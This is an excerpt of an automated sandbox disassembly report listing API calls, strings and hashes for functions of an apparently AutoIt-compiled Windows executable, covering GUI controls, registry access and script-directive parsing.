SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C404C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C40504

Part of subcall function 00BCF9F2: _wcslen.LIBCMT ref: 00BCF9FD

Part of subcall function 00C1223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C12258
Part of subcall function 00C1223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C1228A

Strings

SELECTCLEAR, xrefs: 00C4052D
GETITEMCOUNT, xrefs: 00C40316, 00C40337
SELECT, xrefs: 00C40548
SELECTALL, xrefs: 00C40515
FINDITEM, xrefs: 00C40627
SELECTINVERT, xrefs: 00C4057E
ISSELECTED, xrefs: 00C404DD
GETSELECTED, xrefs: 00C405E1
GETSELECTEDCOUNT, xrefs: 00C40470, 00C4048B
GETTEXT, xrefs: 00C403EC, 00C40407
GETSUBITEMCOUNT, xrefs: 00C40384, 00C4039F
VIEWCHANGE, xrefs: 00C40675
DESELECT, xrefs: 00C4059C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 5b12e7492ad2a0d53e6a663e815466297c0659d303a43db8147daaa7c1a243dd
Instruction ID: cd358c0252d54d86c130dc09c49cb778d41aef87165dbe3524161b3618badb90
Opcode Fuzzy Hash: 5b12e7492ad2a0d53e6a663e815466297c0659d303a43db8147daaa7c1a243dd
Instruction Fuzzy Hash: 5FE1B2312582018FCB24DF24C45197AB7E6FF98314F248A9CF9A69B3A1DB70EE45CB41

Function 00BC8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC8968
GetSystemMetrics.USER32(00000007), ref: 00BC8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC899B
GetSystemMetrics.USER32(00000008), ref: 00BC89A3
GetSystemMetrics.USER32(00000004), ref: 00BC89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BC89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BC89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BC8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BC8A3C
GetClientRect.USER32(00000000,000000FF), ref: 00BC8A5A
GetStockObject.GDI32(00000011), ref: 00BC8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC8A81

Part of subcall function 00BC912D: GetCursorPos.USER32(?), ref: 00BC9141
Part of subcall function 00BC912D: ScreenToClient.USER32(00000000,?), ref: 00BC915E
Part of subcall function 00BC912D: GetAsyncKeyState.USER32(00000001), ref: 00BC9183
Part of subcall function 00BC912D: GetAsyncKeyState.USER32(00000002), ref: 00BC919D

SetTimer.USER32(00000000,00000000,00000028,00BC90FC), ref: 00BC8AA8

Strings

AutoIt v3 GUI, xrefs: 00BC8A20

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: fdac6c021a11b7c44d80ce2c0d19de4f6881de2a3072919df28a0c7792f742e6
Instruction ID: faf93f4588e04ade0000172cc2796f8f0a0b98a295d4ad7ec296af9bcdd8fbff
Opcode Fuzzy Hash: fdac6c021a11b7c44d80ce2c0d19de4f6881de2a3072919df28a0c7792f742e6
Instruction Fuzzy Hash: 4BB19A35A0020AAFDB14DFA8CC85FAE3BF5FB48314F054269FA15A72E0CB74A941CB54

Function 00C10D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C11114
Part of subcall function 00C110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C11120
Part of subcall function 00C110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C1112F
Part of subcall function 00C110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C11136
Part of subcall function 00C110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C1114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C10DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C10E29
GetLengthSid.ADVAPI32(?), ref: 00C10E40
GetAce.ADVAPI32(?,00000000,?), ref: 00C10E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C10E96
GetLengthSid.ADVAPI32(?), ref: 00C10EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C10EB5
HeapAlloc.KERNEL32(00000000), ref: 00C10EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C10EDD
CopySid.ADVAPI32(00000000), ref: 00C10EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C10F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C10F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C10F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C10F6E
HeapFree.KERNEL32(00000000), ref: 00C10F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C10F7E
HeapFree.KERNEL32(00000000), ref: 00C10F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C10F8E
HeapFree.KERNEL32(00000000), ref: 00C10F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00C10FA1
HeapFree.KERNEL32(00000000), ref: 00C10FA8

Part of subcall function 00C11193: GetProcessHeap.KERNEL32(00000008,00C10BB1,?,00000000,?,00C10BB1,?), ref: 00C111A1
Part of subcall function 00C11193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C10BB1,?), ref: 00C111A8
Part of subcall function 00C11193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C10BB1,?), ref: 00C111B7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 371a79236ce11e8cebcafa1b4109cb20d052396a733bac1aefe706e723fe5e49
Instruction ID: bdb91fd0ece923e353f30c776bf23b34ceebe0c726c00969c467a774f8653747
Opcode Fuzzy Hash: 371a79236ce11e8cebcafa1b4109cb20d052396a733bac1aefe706e723fe5e49
Instruction Fuzzy Hash: 01718D7290120AEBDF20DFA5DC45FEEBBB8BF06300F144115F929A61A1D7709A96DB60

Function 00C3C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C4CC08,00000000,?,00000000,?,?), ref: 00C3C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C3C5A4
_wcslen.LIBCMT ref: 00C3C5F4
_wcslen.LIBCMT ref: 00C3C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C3C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C3C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C3C84D
RegCloseKey.ADVAPI32(?), ref: 00C3C881
RegCloseKey.ADVAPI32(00000000), ref: 00C3C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C3C960

Strings

REG_MULTI_SZ, xrefs: 00C3C6F5
REG_QWORD, xrefs: 00C3C8C3
REG_EXPAND_SZ, xrefs: 00C3C5CD
REG_SZ, xrefs: 00C3C644
REG_BINARY, xrefs: 00C3C913
REG_DWORD, xrefs: 00C3C804

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 6a699e4251b40c818f28da78ff7fa7a9157780b3a82219f888dbcd6bb3b4d66a
Instruction ID: ba8857265aabc14cca2b0eedeec45929927d69624059751e628151a02bda1e07
Opcode Fuzzy Hash: 6a699e4251b40c818f28da78ff7fa7a9157780b3a82219f888dbcd6bb3b4d66a
Instruction Fuzzy Hash: 0C1257356142019FC714DF24C891B6EB7E5EF88714F04889DF89AAB3A2DB71ED41CB91

Function 00C4091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C409C6
_wcslen.LIBCMT ref: 00C40A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C40A54
_wcslen.LIBCMT ref: 00C40A8A
_wcslen.LIBCMT ref: 00C40B06
_wcslen.LIBCMT ref: 00C40B81

Part of subcall function 00BCF9F2: _wcslen.LIBCMT ref: 00BCF9FD

Part of subcall function 00C12BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C12BFA

Strings

GETSELECTED, xrefs: 00C40C4E
COLLAPSE, xrefs: 00C40B01, 00C40B1C
GETTOTALCOUNT, xrefs: 00C409F2, 00C40A17
EXISTS, xrefs: 00C40B7C, 00C40B97
ISCHECKED, xrefs: 00C40CE1
GETTEXT, xrefs: 00C40C97
CHECK, xrefs: 00C40A85, 00C40AA0
SELECT, xrefs: 00C40D11
GETITEMCOUNT, xrefs: 00C40C1E
EXPAND, xrefs: 00C40BF8
UNCHECK, xrefs: 00C40D3E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 29b8257d83880e14f21f8f33c080143d80856ac77b1afd23f6a3c706fc2f9bae
Instruction ID: dbd83d17cfeb989098d38a7c253a380507c21dee3ea507b1b8dc94a7ce19a7aa
Opcode Fuzzy Hash: 29b8257d83880e14f21f8f33c080143d80856ac77b1afd23f6a3c706fc2f9bae
Instruction Fuzzy Hash: C5E1C1356483018FCB14DF25C49196AB7E1FF98314F24899DF9AA9B362DB30EE45CB81

Function 00C3C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3B6AE,?,?), ref: 00C3C9B5
_wcslen.LIBCMT ref: 00C3C9F1
_wcslen.LIBCMT ref: 00C3CA68
_wcslen.LIBCMT ref: 00C3CA9E
_wcslen.LIBCMT ref: 00C3CAF9
_wcslen.LIBCMT ref: 00C3CB2F
_wcslen.LIBCMT ref: 00C3CB7F

Strings

HKEY_CURRENT_CONFIG, xrefs: 00C3CB79, 00C3CB7E
HKEY_CLASSES_ROOT, xrefs: 00C3CAF3, 00C3CAF8
HKCC, xrefs: 00C3CBAC
HKEY_LOCAL_MACHINE, xrefs: 00C3CA62, 00C3CA67
HKLM, xrefs: 00C3CA98, 00C3CA9D
HKU, xrefs: 00C3CBF0
HKEY_USERS, xrefs: 00C3CBDF
HKEY_CURRENT_USER, xrefs: 00C3CBBD
HKCU, xrefs: 00C3CBCE
HKCR, xrefs: 00C3CB29, 00C3CB2E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 89571a8a894b82e2a258fee26d547a24bbb3d0f3fec7f571ccbb830f7319c99d
Instruction ID: 1daafbd718498d7ed87725a6c12ba1a3efcc4823fda2eb7c4f1834930a182886
Opcode Fuzzy Hash: 89571a8a894b82e2a258fee26d547a24bbb3d0f3fec7f571ccbb830f7319c99d
Instruction Fuzzy Hash: AC71F23262012A8BCF20DE7DCDD16BE7391AF60754F254268F876B7284EA35CE45D3A0

Function 00C4833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C4835A
_wcslen.LIBCMT ref: 00C4836E
_wcslen.LIBCMT ref: 00C48391
_wcslen.LIBCMT ref: 00C483B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C483F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C45BF2), ref: 00C4844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C48487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C484CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C48501
FreeLibrary.KERNEL32(?), ref: 00C4850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4851D
DestroyIcon.USER32(?,?,?,?,?,00C45BF2), ref: 00C4852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C48549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C48555

Strings

.exe, xrefs: 00C48388
.icl, xrefs: 00C48368
.dll, xrefs: 00C483AB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 4fa58594075bad529c4aea6a40f6e67d0375887318bb0bcd4ad2be881970884f
Instruction ID: b2fb1f500851375796ed3fe4c4bacdeff48af3413e7db07d67b305ed5a426bc2
Opcode Fuzzy Hash: 4fa58594075bad529c4aea6a40f6e67d0375887318bb0bcd4ad2be881970884f
Instruction Fuzzy Hash: 1061E271900215BFEB14DF64CC81BBE77A8FB04711F10465AF925D61E1EBB4AA84DBA0

Function 00BB7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#OnAutoItStartRegister, xrefs: 00BB7817
Bad directive syntax error, xrefs: 00BF519A
#include, xrefs: 00BB7847
#cs, xrefs: 00BB7873, 00BB78C5
Unterminated group of comments, xrefs: 00BF528C
Cannot parse #include, xrefs: 00BF5279
', xrefs: 00BF5169
#include-once, xrefs: 00BB782F
#comments-end, xrefs: 00BB78D9
#comments-start, xrefs: 00BB785F, 00BB78B1
#ce, xrefs: 00BB78ED
", xrefs: 00BF5153
#pragma compile, xrefs: 00BB77D3
#requireadmin, xrefs: 00BB77FF
#notrayicon, xrefs: 00BB77E7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 804b29ab153e8a2cfaadb8999d17cbc3c2f8cf29bd0bbb7d131e86c88a748cff
Instruction ID: 4968c57c43612a06677c9059058bae2d459398eab6c32e341911fe6d1f7ee8fe
Opcode Fuzzy Hash: 804b29ab153e8a2cfaadb8999d17cbc3c2f8cf29bd0bbb7d131e86c88a748cff
Instruction Fuzzy Hash: F081C271A44609BBDB20AF61CC82FFE77E9EF55300F0440A5FA05AB192EFB0DA15D691

Function 00C15A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C15A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C15A40
SetWindowTextW.USER32(?,?), ref: 00C15A57
GetDlgItem.USER32(?,000003EA), ref: 00C15A6C
SetWindowTextW.USER32(00000000,?), ref: 00C15A72
GetDlgItem.USER32(?,000003E9), ref: 00C15A82
SetWindowTextW.USER32(00000000,?), ref: 00C15A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C15AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C15AC3
GetWindowRect.USER32(?,?), ref: 00C15ACC
_wcslen.LIBCMT ref: 00C15B33
SetWindowTextW.USER32(?,?), ref: 00C15B6F
GetDesktopWindow.USER32 ref: 00C15B75
GetWindowRect.USER32(00000000), ref: 00C15B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C15BD3
GetClientRect.USER32(?,?), ref: 00C15BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00C15C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C15C2F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: f39833fbbf5d38de134c04250c3f854863bc48be9bd51e5759fe04fad6cd4478
Instruction ID: f514d1e8e68f93e4f4fe627fa11589620df965c6b725ecf7d2eccf7b648ff167
Opcode Fuzzy Hash: f39833fbbf5d38de134c04250c3f854863bc48be9bd51e5759fe04fad6cd4478
Instruction Fuzzy Hash: 6A719D31900B09EFDB20DFA9CE85BAEBBF5FF89704F104518E552A25A0D775EA80DB50

Function 00BD00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BD00C6

Part of subcall function 00BD00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00C8070C,00000FA0,7E74F257,?,?,?,?,00BF23B3,000000FF), ref: 00BD011C
Part of subcall function 00BD00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BF23B3,000000FF), ref: 00BD0127
Part of subcall function 00BD00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BF23B3,000000FF), ref: 00BD0138
Part of subcall function 00BD00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BD014E
Part of subcall function 00BD00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BD015C
Part of subcall function 00BD00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BD016A
Part of subcall function 00BD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD0195
Part of subcall function 00BD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD01A0

___scrt_fastfail.LIBCMT ref: 00BD00E7

Part of subcall function 00BD00A3: __onexit.LIBCMT ref: 00BD00A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BD0122
InitializeConditionVariable, xrefs: 00BD0148
SleepConditionVariableCS, xrefs: 00BD0154
WakeAllConditionVariable, xrefs: 00BD0162
kernel32.dll, xrefs: 00BD0133

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: c37dae9600c454d535e07c1b3b7627b22320c7bb8d523a87e4f745feed45fef2
Instruction ID: 537698f39c91d9acee3bae37109d27fd7f0c1ab6f473d2a0f38f8aa36ee294c5
Opcode Fuzzy Hash: c37dae9600c454d535e07c1b3b7627b22320c7bb8d523a87e4f745feed45fef2
Instruction Fuzzy Hash: D421C636A557116BE7517FA4AC45B6EB7D4FF05B61F1001BEF801A33A1EF7498008A94

Function 00C130F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C1318D
_wcslen.LIBCMT ref: 00C131F8

Strings

CLASS, xrefs: 00C13188, 00C131A5
CLASSNN, xrefs: 00C131F3, 00C13204
TEXT, xrefs: 00C1347C
NAME, xrefs: 00C13335, 00C13346
INSTANCE, xrefs: 00C13453
REGEXPCLASS, xrefs: 00C13255, 00C13266

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 06601d1bac018c8e7fdadd0fda69c58c07d523b92f84a21a476c362b9a8fd513
Instruction ID: 2c6f434de6dc02e02652f68bc444a964bd800f53c4cb0fbe0cb9440ef73dc2ee
Opcode Fuzzy Hash: 06601d1bac018c8e7fdadd0fda69c58c07d523b92f84a21a476c362b9a8fd513
Instruction Fuzzy Hash: 63E13531A00556ABCF149FA8C8416FDFBB5BF05714F64816AE466F3240DB70AFC5A790

Function 00C244C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00C4CC08), ref: 00C24527
_wcslen.LIBCMT ref: 00C2453B
_wcslen.LIBCMT ref: 00C24599
_wcslen.LIBCMT ref: 00C245F4
_wcslen.LIBCMT ref: 00C2463F
_wcslen.LIBCMT ref: 00C246A7

